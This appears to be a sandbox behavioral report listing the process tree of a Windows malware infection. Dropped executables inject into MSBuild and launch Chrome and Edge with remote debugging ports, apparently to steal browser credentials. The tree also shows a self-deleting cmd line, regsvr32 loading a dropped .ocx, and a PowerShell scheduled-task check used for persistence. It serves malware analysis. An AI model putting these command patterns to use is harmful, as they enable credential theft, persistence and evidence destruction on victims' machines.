C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1964,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=1952 /prefetch:211⤵PID:1676
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1560,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2240 /prefetch:311⤵PID:1964
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2368,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=2444 /prefetch:811⤵PID:3140
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3124,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3136 /prefetch:111⤵
- Uses browser remote debugging
PID:2040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2580,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=3356 /prefetch:111⤵
- Uses browser remote debugging
PID:624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3984,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4048 /prefetch:211⤵
- Uses browser remote debugging
PID:3104
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4608,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=4584 /prefetch:111⤵
- Uses browser remote debugging
PID:860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5180,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5208 /prefetch:811⤵PID:4584
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5296,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5308 /prefetch:811⤵PID:3480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5228,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5212 /prefetch:811⤵PID:3232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3704,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5700 /prefetch:811⤵PID:3248
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5448,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5864 /prefetch:811⤵PID:2528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5356,i,7475192547464277015,9552902168395343007,262144 --variations-seed-version=20250314-050508.937000 --mojo-platform-channel-handle=5856 /prefetch:811⤵PID:4076
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"10⤵
- Uses browser remote debugging
PID:5612 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x23c,0x240,0x244,0x238,0x2a4,0x7ffe4345f208,0x7ffe4345f214,0x7ffe4345f22011⤵PID:116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=1980,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=1972 /prefetch:211⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1776,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=2020 /prefetch:311⤵PID:2732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1424,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=2704 /prefetch:811⤵PID:6036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3552,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:111⤵
- Uses browser remote debugging
PID:3744
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,11673979220982409735,5945991548986697935,262144 --variations-seed-version --mojo-platform-channel-handle=3640 /prefetch:111⤵
- Uses browser remote debugging
PID:544
-
-
-
C:\ProgramData\knyukx4ect.exe"C:\ProgramData\knyukx4ect.exe"10⤵PID:6948
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:6980
-
-
-
C:\ProgramData\wb1n79r9hd.exe"C:\ProgramData\wb1n79r9hd.exe"10⤵PID:6228
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"11⤵PID:6224
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
PID:25076 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffe4482dcf8,0x7ffe4482dd04,0x7ffe4482dd1013⤵PID:25100
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2460,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2456 /prefetch:213⤵PID:25508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1572,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2488 /prefetch:313⤵PID:25516
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2088,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:813⤵PID:25552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=3284 /prefetch:113⤵
- Uses browser remote debugging
PID:25580
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3240,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=3304 /prefetch:113⤵
- Uses browser remote debugging
PID:25588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=4284 /prefetch:213⤵
- Uses browser remote debugging
PID:20156
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4640,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:113⤵
- Uses browser remote debugging
PID:25268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,18214201051692195809,14663199719591728026,262144 --variations-seed-version --mojo-platform-channel-handle=5044 /prefetch:813⤵PID:4596
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory=""12⤵
- Uses browser remote debugging
PID:25644 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --edge-skip-compat-layer-relaunch13⤵
- Uses browser remote debugging
PID:25748 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x2f0,0x7ffe44c3f208,0x7ffe44c3f214,0x7ffe44c3f22014⤵PID:26104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:314⤵PID:26412
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2568,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2552 /prefetch:214⤵PID:24572
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2172,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=2940 /prefetch:814⤵PID:860
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3456,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:114⤵
- Uses browser remote debugging
PID:25716
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --remote-debugging-port=9229 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3464,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=3520 /prefetch:114⤵
- Uses browser remote debugging
PID:25732
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4664,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=5004 /prefetch:814⤵PID:26116
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4904,i,9476823008155943959,7379967352101494505,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:814⤵PID:24988
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\GCFCFCGCGI.exe"12⤵PID:11996
-
C:\Users\Admin\GCFCFCGCGI.exe"C:\Users\Admin\GCFCFCGCGI.exe"13⤵PID:11080
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵PID:11008
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"15⤵
- Uses browser remote debugging
PID:19948 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffe5472dcf8,0x7ffe5472dd04,0x7ffe5472dd1016⤵PID:20696
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1988,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=1984 /prefetch:216⤵PID:22404
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2144,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=2132 /prefetch:316⤵PID:6460
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2276,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=2808 /prefetch:816⤵PID:23308
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3236,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=3300 /prefetch:116⤵
- Uses browser remote debugging
PID:23072
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3244,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=3320 /prefetch:116⤵
- Uses browser remote debugging
PID:22892
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4204,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4232 /prefetch:216⤵
- Uses browser remote debugging
PID:18316
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4452 /prefetch:116⤵
- Uses browser remote debugging
PID:23108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4808,i,16348002627858791121,13740926337866850820,262144 --variations-seed-version --mojo-platform-channel-handle=4928 /prefetch:816⤵PID:10236
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\IIJEBFCFIJ.exe"12⤵PID:11088
-
C:\Users\Admin\IIJEBFCFIJ.exe"C:\Users\Admin\IIJEBFCFIJ.exe"13⤵PID:10756
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"14⤵PID:10712
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c start "" "C:\Users\Admin\BKJKJEHJJD.exe"12⤵PID:9664
-
C:\Users\Admin\BKJKJEHJJD.exe"C:\Users\Admin\BKJKJEHJJD.exe"13⤵PID:10396
-
C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bbE3GYiwqAzDhysT.exeC:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bbE3GYiwqAzDhysT.exe 014⤵PID:10376
-
C:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bfwPSGVrNnP06fHt.exeC:\Users\Admin\AppData\Local\Temp\PW4Lcljo\bfwPSGVrNnP06fHt.exe 1037615⤵PID:10320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10320 -s 63216⤵
- Program crash
PID:24396
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10376 -s 96815⤵
- Program crash
PID:18608
-
-
-
-
-
-
-
C:\ProgramData\h4wb1dbiek.exe"C:\ProgramData\h4wb1dbiek.exe"10⤵PID:4552
-
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\sHmUQoFG1f5KA3vK.exe 011⤵PID:3052
-
C:\Users\Admin\AppData\Local\Temp\mM4zRoPf\I5SvKir3cjYvYxin.exeC:\Users\Admin\AppData\Local\Temp\mM4zRoPf\I5SvKir3cjYvYxin.exe 305212⤵PID:2528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2528 -s 88013⤵
- Program crash
PID:18848
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3052 -s 92012⤵
- Program crash
PID:18984
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\f379r" & exit10⤵PID:24464
-
C:\Windows\SysWOW64\timeout.exetimeout /t 1111⤵
- Delays execution with timeout.exe
PID:19684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4708 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵PID:908
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"9⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4396
-
-
-
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2996 -
C:\Users\Admin\AppData\Local\Temp\is-GKS5B.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-GKS5B.tmp\Bell_Setup16.tmp" /SL5="$1101F8,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"9⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5172 -
C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5636 -
C:\Users\Admin\AppData\Local\Temp\is-2433N.tmp\Bell_Setup16.tmp"C:\Users\Admin\AppData\Local\Temp\is-2433N.tmp\Bell_Setup16.tmp" /SL5="$90060,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT11⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:4008 -
C:\Windows\SysWOW64\regsvr32.exe"regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"12⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5760 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"13⤵
- Command and Scripting Interpreter: PowerShell
